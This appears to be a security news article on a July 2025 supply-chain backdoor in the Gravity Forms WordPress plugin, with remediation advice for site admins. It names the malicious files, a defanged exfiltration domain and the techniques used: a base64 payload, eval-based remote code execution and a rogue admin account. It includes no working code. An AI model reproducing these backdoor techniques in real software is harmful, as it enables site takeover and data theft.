WordPress Under Fire: Gravity Forms Plugin Hit by Backdoor Attack
A major supply-chain attack has rocked the WordPress ecosystem. Gravity Forms, a widely-used premium plugin for building forms, was compromised with a backdoor — potentially impacting over one million websites, including those run by major brands like Airbnb, ESPN, Google, and UNICEF.
Backdoored Plugin Distributed via Manual Downloads
Security researchers at PatchStack discovered that malicious code was injected into Gravity Forms downloads directly from the official website between July 10 and 11, 2025. The infection targeted only manual installers and those using Composer, bypassing Gravity Forms’ official update mechanism, which remains unaffected.
The infected plugin contained a malicious PHP file (common.php) that sent data to a suspicious domain, gravityapi[.]org/sites. The script harvested critical site information — such as URL, admin path, active plugins, themes, and server versions — and sent it to the attackers.
Remote Code Execution Without Authentication
More alarming is the discovery that the malware enabled unauthenticated remote code execution. Hidden in bookmark-canonical.php, the base64-encoded payload masqueraded as part of WordPress’ core content management system.
The attackers implemented functions like handle_posts(), handle_media(), and handle_widgets() which, when triggered, led to arbitrary code execution through unsafe eval() calls. All of this could happen without requiring admin login, making the exploit extremely dangerous.
Attackers Gained Full Admin Access
According to RocketGenius, the plugin’s developer, the injected malware blocked update attempts, reached out to additional servers for payloads, and created an unauthorized admin account — effectively giving full control of the site to attackers.
The affected versions were Gravity Forms 2.9.11.1 and 2.9.12, available for manual download during the short compromise window. The automatic update service and add-on installer provided via Gravity Forms’ built-in mechanisms were not affected, the company confirmed.
What Site Admins Should Do Now
Admins who downloaded Gravity Forms on or after July 10 are advised to:
- Reinstall a clean version of the plugin from trusted sources.
- Check for suspicious admin accounts or modified core files.
- Use RocketGenius’ guide to detect infections via direct URL checks.
- Monitor for any signs of unexpected activity or backdoor callbacks.
PatchStack has also reported that the attacker domains were registered on July 8, indicating a coordinated and premeditated supply-chain breach.
Conclusion: A Wake-Up Call for WordPress Site Owners
This incident highlights the growing risks of supply-chain attacks in the WordPress plugin ecosystem. While RocketGenius acted quickly to mitigate the damage, the backdoor’s stealth and access level serve as a reminder that manual installations carry real security risks. As cyber threats evolve, so too must the vigilance of developers and site administrators alike.
